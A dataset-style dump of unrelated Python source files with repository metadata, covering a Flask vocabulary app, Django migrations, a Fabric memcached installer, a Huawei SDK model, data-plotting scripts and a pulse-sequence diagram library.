0fb8c5cd4f2a1620ff306c658432e91e53d776d3 | 12dcb1cbea551159b1dee36e95b7950d532b2ccc | /app/views/word.py | 10b210a2d5b0f23f6ea940e9b30e2965a77522f5 | [] | no_license | guangyugeng/shanbay_word | 7cd6ac36e2adfee2ab2b85f175ed569f677dd155 | 6b5c984c3980f977035fcf292092593bc93a1469 | refs/heads/master | 2021-01-19T08:58:47.726767 | 2017-04-09T11:51:32 | 2017-04-09T11:51:32 | 87,701,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,657 | py | from app import app, db
from flask import render_template, flash, session, redirect, url_for
from flask_login import login_user, logout_user, current_user, login_required
from flask import g, Blueprint
from datetime import datetime
from app.models import Wordbook, Word, TodayWord, TodayWordbook, User, ROLE_USER, ROLE_ADMIN
from app.views.api import update_today_words
main = Blueprint('word', __name__)
@main.before_request
def before_request():
g.user = current_user
if g.user.is_authenticated:
g.user.last_seen = datetime.utcnow()
g.user.save()
@main.route('/word')
@login_required
def word():
user = g.user
return render_template('word/word.html',
user = user
)
@login_required
@main.route('/wordbook')
def wordbook():
user = g.user
learning_wordbook = user.learning_wordbook
my_wordbooks = Wordbook.query.filter_by(user_id=user.id).all()
return render_template('word/wordbook.html',
user = user,
learning_wordbook = learning_wordbook,
my_wordbooks = my_wordbooks
)
@main.route('/setting')
@login_required
def setting():
user = g.user
today_words_amount = str(user.today_words_amount)
learning_wordbook = user.learning_wordbook
amounts = ['20', '50', '100', '150', '200', '250', '300', '400', '500', '600', '700']
return render_template('word/setting.html',
title = 'Home',
user = user,
today_words_amount = today_words_amount,
learning_wordbook = learning_wordbook,
amounts = amounts
)
@main.route('/new_word')
@login_required
def new_word():
user = g.user
wordbook = Wordbook.query.filter_by(book_name=user.learning_wordbook,user_id=user.id).first()
words = Word.query.filter_by(wordbook_id=wordbook.id,learned=False).all()
return render_template('word/new_word.html',
words = words
)
@main.route('/today_word')
@login_required
def today_word():
user = g.user
today_wordbook_id = update_today_words(user, 100)
today_words = TodayWord.query.filter_by(today_wordbook_id=today_wordbook_id).all()
return render_template('word/today_word.html',
words = today_words
)
@main.route('/learned_word')
@login_required
def learned_word():
user = g.user
wordbook = Wordbook.query.filter_by(book_name=user.learning_wordbook,user_id=user.id).first()
words = Word.query.filter_by(wordbook_id=wordbook.id,learned=True).all()
return render_template('word/learned_word.html',
words = words
)
| [
"guangyugeng@guangyugengdeMacBook-Pro.local"
] | guangyugeng@guangyugengdeMacBook-Pro.local |
8c878b62609cfce911163faa0392d39593781f71 | dd5f202f4c08c69a8ed5d6912fcd769fce3e598b | /example/async_sleeper.py | c64ceae030076813bbb7b3c5c8660c1c9ac66e1b | [
"MIT"
] | permissive | zhzLuke96/Yoi | d63cea1782cf77e91cb3b17cd6a8a6d527c559a0 | 8f5a0b6881c540aab71b8a360002b4d1e9de869a | refs/heads/master | 2020-03-28T09:18:23.572749 | 2018-10-27T16:43:07 | 2018-10-27T16:43:07 | 148,027,916 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,432 | py | import time
import asyncio
import datetime
import platform
from yoi.application import Application
from yoi.globals import g, request as cur_request
app = Application()
@app.router(r"^/sleep/(.+)/?$", methods=["GET"])
async def sleep(request, timer):
time.sleep(int(timer))
return f"server sleep {timer}s \n {datetime.datetime.now().strftime('%a, %d %b %Y %H:%M:%S GMT')} \n{cur_request.args}\n{request.args}\n{hash(asyncio.Task.current_task(asyncio.get_event_loop()))}"
@app.router(r"^/aiosleep/(.+)/?$", methods=["GET"])
async def aiosleep(request, timer):
await asyncio.sleep(int(timer))
return f"server sleep {timer}s \n {datetime.datetime.now().strftime('%a, %d %b %Y %H:%M:%S GMT')} \n{cur_request.args}\n{request.args}\n{hash(asyncio.Task.current_task(asyncio.get_event_loop()))}"
@app.router(r"^/do/?$", methods=["GET"])
async def do():
return f"server do something"
@app.errorhandler("404")
def not_found():
return f"<h1>Not Found 404</h1><p>server on {platform.python_version()}</p>"
if __name__ == '__main__':
from yoi.server.aio_wsgiServer import WSGIServer
sev = WSGIServer(app, "127.0.0.1", 8000)
sev.run_forever()
# from wsgiref.simple_server import make_server
# # httpd = make_server("127.0.0.1", 8000, app)
# httpd = make_server("localhost", 8000, app)
# try:
# httpd.serve_forever()
# except:
# httpd.shutdown()
# raise
| [
"zhz961101@gmail.com"
] | zhz961101@gmail.com |
bf84a23ac25841aaf18ddc5f2a8785a878f6e123 | 3313419e883041b04bd09f7e905dc9fb24cd8ec8 | /multi_kmeans_group_line_chart.py | 7559a28604b94a194b5308ec440890374719a7d0 | [] | no_license | xiaosean/preprocess_py | d6d46a91be0d31c3ac082c4dc21587b27b34bf11 | fa480a0f8401c4ccff61ea8215bcf40802b2ba36 | refs/heads/master | 2023-06-23T17:30:19.296637 | 2017-11-06T23:12:02 | 2017-11-06T23:12:04 | 90,627,403 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,789 | py | import numpy as np
import pandas as pd
from time import time
from sklearn.cluster import KMeans
from pandas.computation import expressions as expr
from bokeh.charts import Line, show, output_file, save
import pprint as pp
import sys
from bokeh.palettes import Spectral11, Category10
# set configure
# path = "./CDR_NORMALIZE_CONCAT/"
path = "./CDR_FINAL/"
filename = "0703normalize_65_cols.csv"
# path = "./CDR_ANALYZE/"
# path = "./CDR_CONCAT/"
# filename = sys.argv[1]
# filename = "CDR_CONCAT_TABLE_4_max_min.csv"
# filename = "CDR_CONCAT_TABLE_4.csv"
relative_filename = path + filename #+ ".csv"
# out_filename = "mds_mly_minus20160901"
# after the numeric_st_idx's number will be tranform to int64
# numeric_st_idx = 1
# K = 8
label_path = "./kmean_label/"
output_path = "./CDR_CONCAT_ANALYZE_GRAPH/"
# output_path = "./CDR_CONCAT_ANALYZE_GRAPH_MINI/"
# read revise csv file and print cost time
# just load 5 data
t0 = time()
df_src = pd.read_csv(relative_filename, error_bad_lines=False)
print("time for read csv: %.2f" % (time()-t0))
# -------------------------
for c in df_src.columns[1:]:
if not "CNT" in c:
df_src = df_src.drop(c, 1)
# ----------------------------
# df = df.drop('MINING_DW_SUBSCR_NO', 1)
df_group = pd.read_csv('DNA_KMEANS_RESULT_ID_NEW.csv', error_bad_lines = False)
groups_name = ['1', '2', '3', '4', '5', '6', '7', '8', 'seldom', 'None']
# groups_name = ['1', '2', '3', '4', '5', '6', '7', '8']
# Ks = [8, 7, 6, 7, 5, 6, 6, 8, 7, 7]
Ks = [6, 4, 6, 7, 7, 6, 8, 7, 7, 7]
evening = "Evening user"
moring = "Morning user"
midnight = "Midnight user"
lunch = "Lunch time user"
All = "All day user"
dinner = "Dinner time user"
afternoon = "Afternoon user"
cluster_name = [
{107141:moring, 121153:midnight, 17176:lunch, 59992:afternoon, 32089:evening, 70046:dinner},
{25449:evening, 30950:dinner, 5441:lunch, 59944:midnight, 62860:All},
{20553:afternoon, 20809:dinner, 26798:moring, 32848:midnight, 4801:lunch},
{17959:evening, 24518:dinner, 33790:moring, 35510:midnight, 5181:lunch},
{17238:evening, 25183:dinner, 32834:moring, 31327:midnight, 3892:lunch},
{14298:midnight, 21404:"Late midnight user", 35439:moring, 35802:dinner, 39104:"Office time user"},
{19744:evening, 24966:afternoon, 33129:"Night user", 41770:moring, 44540:midnight},
{106596:dinner, 124046:moring, 146613:midnight, 21343:lunch, 91568:afternoon}
]
norm = "0704"
df_src['Groups'] = df_group['Groups']
for j in range(8):
K = Ks[j]
group = groups_name[j]
df = df_src[df_src['Groups'] == group]
label_path = "./kmean_label/"
# label_name = "label_K" + str(K) + "_de_with_kid_" + group + "_" + norm + ".npy"
label_name = "label_K" + str(K) + "__" + group + "_" + norm + ".npy"
labels_ = np.load(label_path + label_name)
# df.loc['label',list(map(str, df.index))] = labels_
df['label'] = labels_
grouped = df.groupby('label')
print(group)
df['label'] = labels_
grouped = df.drop(['MINING_DW_SUBSCR_NO', 'Groups'], 1).groupby('label')
# grouped = df.groupby('label')
# get count
group_count = grouped[df.columns[1]].count().values
# df = df.drop('MINING_DW_SUBSCR_NO', 1)
# get mean
group_mean = grouped.mean()
# cluster_name = {1012:'每通通話量長', 1470990:'幾乎不用', 23626:'高度使用', 283083:'有在使用', 48456:'夜貓族', 3601:'超高度使用', 68665:'中度使用', 697364:'稍微使用'}
# aggregate display data
data = {}
for i in range(K):
# data[str(i)] = grouped.mean().values[i]
# if "HOUR" in filename:
# # data[cluster_name[cluster_result[i]] + "(" + str(cluster_result[i]) + ")"] = list(map(lambda x: x/30,grouped.mean().values[i]))
# # data["(" + str(group_count[i]) + ")"] = list(map(lambda x: x/30, group_mean.values[i][1:]))
# else:
# # data[cluster_name[cluster_result[i]] + "(" + str(cluster_result[i]) + ")"] = list(map(lambda x: x/4,grouped.mean().values[i]))
# data["(" + str(group_count[i]) + ")"] = list(map(lambda x: x/4, group_mean.values[i][1:]))
# data[cluster_name[j][group_count[i]] + "(" + str(group_count[i]) + ")"] = group_mean.values[i]
data["(" + str(group_count[i]) + ")"] = group_mean.values[i]
# data[str(cluster_name[i])] = grouped.mean().values[i]
pp.pprint(df.columns[1:-2])
# select label
# xl = str(df.columns)
# xl = "MO_0_24 MT_0_24 MO_SUN_SAT_w_h MT_SUN_SAT_w_h"
xl = "hour"
# if filename.find("WORK") != -1:
# xl = str(df.columns[1:])
# elif filename.find("hours") == -1:
# xl = "SUN ~ SAT"
# yl = "time"
# if filename.find("TIME") == -1:
# yl = "count"
yl = "percentage"
# draw
# # set line colors
# mycolors = []
# # if K > 5:
# # mycolors = Spectral11[0:5] + Spectral11[6:K + 1]
# # else:
# # mycolors = Spectral11[0:K]
# for i in range(K):
# mycolors.append(Spectral11[i * 2])
title = "Group " + group
line = Line(data, ylabel = yl, xlabel = xl, color = Category10[10], title = title, legend = "top_center")
# line = Line(data, ylabel = 'mean ' + sys.argv[2], xlabel = xl)
# line.legend.orientation = 'horizontal'
legend = line.legend
legend.plot = None
legend.location = (0 , 300)
line.add_layout(legend[0], "right")
line.xaxis.axis_label_text_font_size = '20px'
line.yaxis.axis_label_text_font_size = '20px'
line.title.text_font_size = '30px'
# save file
# output_file("test_K" + str(i + 1) + ".html")
output_filename = ("%s_K%d_G%s_%s_line.html" % (filename[:-4], K, group, norm))
output_file(output_path + output_filename)
# output_file(output_path + filename[:-4] + "_K" + str(K) + "_NAME_distribution.html")
save(line)
# show(line)
# # save file
# # output_file("test_K" + str(i + 1) + ".html")
# line.title.text = title + " DETAIL"
# output_file(output_path + filename[:-4] + "_K" + str(K) + "_NAME_LARGE_distribution.html")
# save(line)
# # show(line) | [
"xiaosean5408@gmail.com"
] | xiaosean5408@gmail.com |
9ee8c45a0a1b6322c5d70c2a111aabf4840f4924 | 40a8d8c2c2bb98b6a27dd62825a601597e2970c5 | /home/management/commands/load_initial_data.py | 7fac54795d1eb102cf1db3da1f3040d1d30edc49 | [] | no_license | crowdbotics-users/elmedina3crowdboticsc-643 | 24dba124e00a7bef109cadebd9b5f07c4545c886 | 59274ebe30f52bab5455b4d853b4a75d6bd97c66 | refs/heads/master | 2020-04-16T04:51:54.804699 | 2019-01-11T17:36:08 | 2019-01-11T17:36:08 | 165,283,758 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py |
from django.core.management import BaseCommand
from home.models import CustomText, HomePage
def load_initial_data():
homepage_body = """
<h1 class="display-4 text-center">dj-app-160</h1>
<p class="lead">
This is the sample application created and deployed from the crowdbotics slack app. You can
view list of packages selected for this application below
</p>"""
customtext_title = 'dj-app-160'
CustomText.objects.create(title=customtext_title)
HomePage.objects.create(body=homepage_body)
class Command(BaseCommand):
can_import_settings = True
help = 'Load initial data to db'
def handle(self, *args, **options):
load_initial_data()
| [
"sp.gharti@gmail.com"
] | sp.gharti@gmail.com |
312637afdc22a6a403f21ab89f1a066ac79782ef | 64ddafc70e72f2dffebe9a76fccd62c710aabad1 | /fabfile.py | 37dc370fe2bbc4741273c9ed2129b54a470ac5e1 | [] | no_license | gkevlin/napalm_test | e2998791b9189e0ce6860d0b86ad47121702beb0 | 2e1a96cfbb86e147df2682847d810a9bc413f171 | refs/heads/master | 2021-01-17T05:58:15.056792 | 2017-04-28T05:54:23 | 2017-04-28T05:54:23 | 61,871,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | true | false | 442 | py | # Fabfile to:
# - update the remote system(s)
# - download and install an application
# Import Fabric's API module
from fabric.api import *
env.hosts = [
'localhost',
# 'ip.add.rr.ess
# 'server2.domain.tld',
]
env.user = "george"
def install_memcached():
""" downloand and install memcached. """
sudo("apt-get install -y memcached")
def update_install():
# Update
# update_upgrade()
# INstall
install_memcached()
| [
"g_kevlin@yahoo.com"
] | g_kevlin@yahoo.com |
cf1e966e07376d6b36bff43b29d054d6605dc0c0 | d590049d83ff2ae4a6682e75aba408146856931f | /topanalytics/migrations/0003_meta_topchretien.py | 7104d1603975a603c203dfa1f0019b58c322423d | [] | no_license | Drey77/topanalytics | f59653f93e16397774cd86f5e4a198e6dabea728 | b178b309ff9092cdd8effcd91b85e6312bb7648a | refs/heads/master | 2021-01-20T05:01:09.887206 | 2017-11-02T20:04:58 | 2017-11-02T20:04:58 | 101,409,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 870 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-14 09:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('topanalytics', '0002_auto_20170817_1010'),
]
operations = [
migrations.CreateModel(
name='Meta_TopChretien',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nickname', models.CharField(blank=True, max_length=25, unique=True)),
('topuser_id', models.CharField(blank=True, max_length=254, unique=True)),
('profile_picture', models.CharField(blank=True, max_length=254)),
('gender', models.CharField(blank=True, max_length=254)),
],
),
]
| [
"Zoldik77@hotmail.com"
] | Zoldik77@hotmail.com |
10a2193d745f0d20b165bd38fb86220c8fd0e02e | 977a791cc3dcd02a6df44d0bfefb24993cc9eb5e | /demo.py | a7dbbdcc4f3a42e7e4d1955520273f2582d030c4 | [] | no_license | swapnil8551/Python-pratice-Problem | a25978a3e8d4e7ab780d0697b0a1a90c3317840c | fd1c71bb44c0e0e86c66d29260f0ff4d0b6239e9 | refs/heads/main | 2023-02-17T20:00:20.398853 | 2021-01-10T14:12:15 | 2021-01-10T14:12:15 | 328,394,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | message='Hello'
msg='Swapnil'
demo=message + " " + msg + ' Dhoble!'
demo1= f'{message}, {msg} Dhoble!'
print(demo)
print(help(str.lower))
| [
"noreply@github.com"
] | swapnil8551.noreply@github.com |
17ad25d2e8dffa7fe47383880b68f953bfa4d2ee | 558a217cc362e5f00a8f89a202d3f0ca19a697cd | /generators/app/templates/app.py | b8dcce9fa94d482e23ff32014f936b9f5cf06bc4 | [
"MIT"
] | permissive | thinkulum/generator-python-cmd | 77059a14423acadabe86d20d5c20006db3301e9b | 769a5854a30ecfe39e14caabb41dd1133ba47b7f | refs/heads/master | 2023-01-14T07:50:28.023166 | 2020-04-21T01:56:49 | 2020-04-21T01:56:49 | 94,433,224 | 0 | 0 | MIT | 2023-01-06T01:32:17 | 2017-06-15T11:34:04 | Python | UTF-8 | Python | false | false | 2,238 | py | import sys
import os
import <%= packageName %>
def get_cmd_line():
"""Extract the app command line from sys.argv.
:return: The command and any arguments for it that are to be sent to the
app.
:rtype: str
"""
# If the user has entered any commands for the app, they are all the
# elements of sys.argv that are after the script name.
# Normally the script will be run with a command like "python script.py",
# and the script name will simply be sys.argv[0]. But there are some
# exceptions. The command line might be sent as a command-line argument
# to a separate script, such as a testing script, in which case the script
# name we want will be at argv[1] or later.
# The script name can appear in different forms. It might appear as only
# the filename or as the full path. To avoid testing for both and dealing
# with OS separators, let's assume a string that ends with the filename
# might be the expected script name.
script_name = os.path.basename(__file__)
# The script name can also be '-c' if the Python interpreter was run with
# that option. It can be the empty string if the interpreter was given
# no script name.
# It's convenient to get the script name index by finding the script name
# and then finding its index, which suggests a list comprehension.
argv_scripts = [arg for arg in sys.argv
if arg.endswith(script_name) or arg in ['-c', '']]
# We'll return None if there are no elements after the script name.
line = None
if len(argv_scripts) > 0:
# We're assuming the first element that matches a script name
# argument is the script name we expect from an argv.
argv_script = argv_scripts[0]
script_index = sys.argv.index(argv_script)
if len(sys.argv) > script_index + 1:
# cmd will parse the line itself, so we'll give it the arguments
# as a single string.
line = ' '.join(sys.argv[script_index + 1:])
return line
def main():
cli = <%= packageName %>.cli.CLI()
line = get_cmd_line()
if line:
return cli.onecmd(line)
else:
cli.cmdloop()
if __name__ == '__main__':
main()
| [
"thinkulum@gmail.com"
] | thinkulum@gmail.com |
62647d2ec8eadfac3792464d7cf95f9ea7218ebd | 0fb0901bc36d3cc433a2784c9bdc929836c1cf68 | /movies/apps.py | 5a9b320b8a9ad8882d7d03a85d819550b288b3ef | [] | no_license | JaysanJaychiev/Movies | b906699e2d036d5fb14b94e0105197ae0b8f7aa5 | a3daa290464e539c0513b5b26e257757269a2615 | refs/heads/main | 2023-09-02T19:59:46.988319 | 2021-11-18T15:26:03 | 2021-11-18T15:26:03 | 429,102,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from django.apps import AppConfig
class MoviesConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'movies'
verbose_name = "Фильмы"
| [
"jays.26@mail.ru"
] | jays.26@mail.ru |
2a7ff6d0903eefe973ced4d02def9ab3742f995c | 12a12dbaf416b7719810609988cd3f0d17b2d07a | /erp/migrations/0022_auto_20200113_1027.py | e618095e4db240f349a4b65bf0abc5c8495424f2 | [] | no_license | atulmala/classup2 | fca29f49481df1ad6393f14873fdc50a9557d271 | 62b7ad1164f7e548e6d599584eca7e6bfec311cc | refs/heads/master | 2022-09-20T15:33:59.119122 | 2020-06-01T11:20:14 | 2020-06-01T11:20:14 | 269,696,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('erp', '0021_collecttransportfee'),
]
operations = [
migrations.AlterField(
model_name='collecttransportfee',
name='bus_fee',
field=models.DecimalField(default=0.0, max_digits=8, decimal_places=2),
),
migrations.AlterField(
model_name='collecttransportfee',
name='slab',
field=models.CharField(default=b'X', max_length=2),
),
]
| [
"atul.gupta@classup.in"
] | atul.gupta@classup.in |
25140fd3f3e7a5763f3bfe8bf6267351ff1b11e0 | 47f391758b56668f4ad8c927b4250a4317098ade | /Lab1(5).py | beca4a0b821cd36b8eec8e3d3235d863051f79e7 | [] | no_license | panas-zinchenko/zinchenko_lab | 3a57cc6aa2d7e1082f3efac36cb1b87f0e44ba60 | 5d80cd81f5c0b066bbcf26e11d2d6a62c098674d | refs/heads/dev | 2022-08-24T15:02:05.997702 | 2020-05-17T18:13:01 | 2020-05-17T18:13:01 | 264,722,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | print("a)")
print(" * ")
print(" *** ")
print("*****")
print(" *** ")
print(" * ")
print("b)")
print("*****")
print("** **")
print("* * *")
print("** **")
print("*****")
print("c)")
print(" ******* ")
print(" * * ")
print("* Hello *")
print(" * * ")
print(" ******* ")
| [
"38880692+sprtzikps@gmail.com@users.noreply.github.com"
] | 38880692+sprtzikps@gmail.com@users.noreply.github.com |
dafa77b32a8dfcddfc2eb8d2354d543ee1d261d5 | d93edb43a92f6c5b861e749642694f38e77c4edb | /courseinfo/migrations/0003_auto_20210221_0735.py | cd4f3505b033d24f6081cd4f5907cca1a9074c7c | [] | no_license | tooba1712/imtiyaz_tooba_ezu | 61e32151e7c1b1c7cfbfc4f4a0160eb1e27e7fd9 | 26b8e3ce5a61c4579b837b3c94b6d02a96b67360 | refs/heads/main | 2023-04-16T07:03:31.142743 | 2021-04-28T21:35:36 | 2021-04-28T21:35:36 | 362,606,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,227 | py | # Generated by Django 3.1.6 on 2021-02-21 07:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courseinfo', '0002_auto_20210221_0623'),
]
operations = [
migrations.AlterModelOptions(
name='instructor',
options={'ordering': ['last_name', 'first_name', 'disambiguator']},
),
migrations.AlterModelOptions(
name='period',
options={'ordering': ['period_sequence']},
),
migrations.AlterModelOptions(
name='registration',
options={'ordering': ['section', 'student']},
),
migrations.AlterModelOptions(
name='section',
options={'ordering': ['course', 'section_name', 'semester']},
),
migrations.AlterModelOptions(
name='semester',
options={'ordering': ['year__year', 'period__period_sequence']},
),
migrations.AlterModelOptions(
name='student',
options={'ordering': ['last_name', 'first_name', 'disambiguator']},
),
migrations.AlterModelOptions(
name='year',
options={'ordering': ['year']},
),
migrations.AddConstraint(
model_name='instructor',
constraint=models.UniqueConstraint(fields=('last_name', 'first_name', 'disambiguator'), name='unique_instructor'),
),
migrations.AddConstraint(
model_name='registration',
constraint=models.UniqueConstraint(fields=('section', 'student'), name='unique_registration'),
),
migrations.AddConstraint(
model_name='section',
constraint=models.UniqueConstraint(fields=('semester', 'course', 'section_name'), name='unique_section'),
),
migrations.AddConstraint(
model_name='semester',
constraint=models.UniqueConstraint(fields=('year', 'period'), name='unique_semester'),
),
migrations.AddConstraint(
model_name='student',
constraint=models.UniqueConstraint(fields=('last_name', 'first_name', 'disambiguator'), name='unique_student'),
),
]
| [
"tooba2@illinois.edu"
] | tooba2@illinois.edu |
a47d8415c94513aab2c7019425699a484a4715b5 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/list_child_issues_v4_response.py | 3c616232bd4fb42bfe7dfe5c4fc8ea0de1d33c81 | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,537 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ListChildIssuesV4Response(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'issues': 'list[IssueResponseV4]',
'total': 'int'
}
attribute_map = {
'issues': 'issues',
'total': 'total'
}
def __init__(self, issues=None, total=None):
"""ListChildIssuesV4Response - a model defined in huaweicloud sdk"""
super(ListChildIssuesV4Response, self).__init__()
self._issues = None
self._total = None
self.discriminator = None
if issues is not None:
self.issues = issues
if total is not None:
self.total = total
@property
def issues(self):
"""Gets the issues of this ListChildIssuesV4Response.
工作项列表
:return: The issues of this ListChildIssuesV4Response.
:rtype: list[IssueResponseV4]
"""
return self._issues
@issues.setter
def issues(self, issues):
"""Sets the issues of this ListChildIssuesV4Response.
工作项列表
:param issues: The issues of this ListChildIssuesV4Response.
:type: list[IssueResponseV4]
"""
self._issues = issues
@property
def total(self):
"""Gets the total of this ListChildIssuesV4Response.
总数
:return: The total of this ListChildIssuesV4Response.
:rtype: int
"""
return self._total
@total.setter
def total(self, total):
"""Sets the total of this ListChildIssuesV4Response.
总数
:param total: The total of this ListChildIssuesV4Response.
:type: int
"""
self._total = total
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListChildIssuesV4Response):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
eb63614dcb72063dcd495c50b186136197606a99 | 7f5972e57c4336a0fbc084ca7ce486fc87080d57 | /seq_draw/seq_draw.py | 3e5a77c010aa7d28bf9b253de620f03e8da5dc4d | [
"MIT"
] | permissive | deepdumbo/seq_draw | 87c571e9d80c5fdb7d82422fbedc2819e34a4203 | 8107a651186495c0cde62bc4833cb78ff7c6f8d9 | refs/heads/master | 2020-07-02T17:11:39.360881 | 2017-11-08T13:40:10 | 2017-11-08T13:40:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,182 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import copy
import atoms
import misc
class SeqDiagram(object):
def __init__(self, ax=None):
if ax is None:
self.ax = plt.axes([0, 0, 1, 1], frameon=False)
else:
self.ax = ax
self.sqaxes = {}
pass
def __str__(self):
_str = ''
for axis in self.sqaxes.keys():
_str += 'Axis {0:s}:\n'.format(axis)
time_sum = 0.0
for i, atom in enumerate(self.sqaxes[axis]['atoms']):
_str += ' {0:2.3f}: {1:s}\n'.format(time_sum, atom)
time_sum += atom.duration
_str += 'Sum {0:2.3f}\n'.format(time_sum)
return _str
__repr__ = __str__
@property
def ax(self):
return self._ax
@ax.setter
def ax(self, new_ax):
self._ax = new_ax
# remove locators
self._ax.axes.get_xaxis().set_visible(False)
self._ax.axes.get_yaxis().set_visible(False)
pass
def add_axis(self, name, offset_x, offset_y, label=None, label_duration=0.9, plot_kw={}, font_kw={}):
if name in self.sqaxes.keys():
raise Exception('Axis ' + str(name) + ' alreadiy exists.')
self.init_axis(name)
self.sqaxes[name]['offset_x'] = offset_x
self.sqaxes[name]['offset_y'] = offset_y
self.sqaxes[name]['offset_x_init'] = offset_x
self.sqaxes[name]['offset_y_init'] = offset_y
if not (label is None):
self.add_atom(misc.AxisLabel(self, name, label, label_duration, plot_kw=plot_kw, font_kw=font_kw), axis=name)
pass
def init_axis(self, name):
self.sqaxes[name] = {'offset_x': 0.0, 'offset_y': 0.0, 'atoms': list()}
pass
def reset_axis(self, name, keep_first=1):
del self.sqaxes[name]['atoms'][keep_first:]
pass
def init_axes(self, label_duration=0.5, plot_kw=dict(), font_kw=dict()):
self.add_axis('rf', 0.0, 0.7, '$RF$', label_duration, plot_kw=plot_kw, font_kw=font_kw)
self.add_axis('gx', 0.0, 0.5, '$G_{R}$', label_duration, plot_kw=plot_kw, font_kw=font_kw)
self.add_axis('gy', 0.0, 0.3, '$G_{P}$', label_duration, plot_kw=plot_kw, font_kw=font_kw)
self.add_axis('gz', 0.0, 0.1, '$G_{S}$', label_duration, plot_kw=plot_kw, font_kw=font_kw)
pass
def reset_axes(self):
for axis in self.sqaxes.keys():
self.reset_axis(axis)
def add_atom(self, atom, axis=None):
if not (axis is None):
atom = self.set_axis(atom, new_axis=axis)
if isinstance(atom, (list, tuple)):
for a in atom:
self.add_atom(a, axis=axis)
else:
if atom.sqaxis in self.sqaxes.keys():
self.sqaxes[atom.sqaxis]['atoms'].append(atom)
else:
raise Exception('Unknown axis ' + atom.sqaxis + '. Possible values are ' + str(self.sqaxes.keys()))
def draw(self, debug=False, debug_intensity=0.075, debug_labels=True):
for axis in self.sqaxes.keys():
for i, pulse in enumerate(self.sqaxes[axis]['atoms']):
pulse.draw()
if debug:
pulse.draw_debug(intensity=debug_intensity, label=debug_labels, index=i)
# reset origin
for axis in self.sqaxes.keys():
self.sqaxes[axis]['offset_x'] = self.sqaxes[axis]['offset_x_init']
self.sqaxes[axis]['offset_y'] = self.sqaxes[axis]['offset_y_init']
def set_axis(self, atom, new_axis):
if isinstance(atom, (list, tuple)):
atom = [self.set_axis(a, new_axis) for a in atom]
else:
if isinstance(atom, atoms.AxesAtom):
atom = copy.copy(atom)
if isinstance(atom, atoms.AtomIterator):
atom.atom = copy.copy(atom.atom)
atom.sqaxis = new_axis
else:
raise Exception('Argument atom needs to be a subclass of AxisAtom or a list of AxisAtoms, but atom is ' + type(atom))
return atom
def get_total_duration(self, atom):
if isinstance(atom, (list, tuple)):
return sum([self.get_total_duration(a) for a in atom])
else:
if isinstance(atom, atoms.AxesAtom):
return atom.duration
raise Exception('Argument atom needs to be a subclass of AxisAtom or a list of AxisAtoms, but atom is ' + type(atom))
def fill(self, axes=None, tp=None, plot_kw={}):
if axes is None:
axes = self.sqaxes.keys()
# compute sum
sums = {}
max_sum = 0.0
max_ax = axes[0]
for ax in axes:
sums[ax] = 0.0
for atom in self.sqaxes[ax]['atoms']:
sums[ax] += atom.duration
if max_sum < sums[ax]:
max_sum = sums[ax]
max_ax = ax
if (not (tp is None)) and tp >= max_sum:
max_sum = tp
max_ax = None
for ax in set(axes) - set([max_ax]):
self.add_atom(misc.Line(self, ax, max_sum - sums[ax], plot_kw=plot_kw), axis=ax)
pass
| [
"markus.boland@dzne.de"
] | markus.boland@dzne.de |
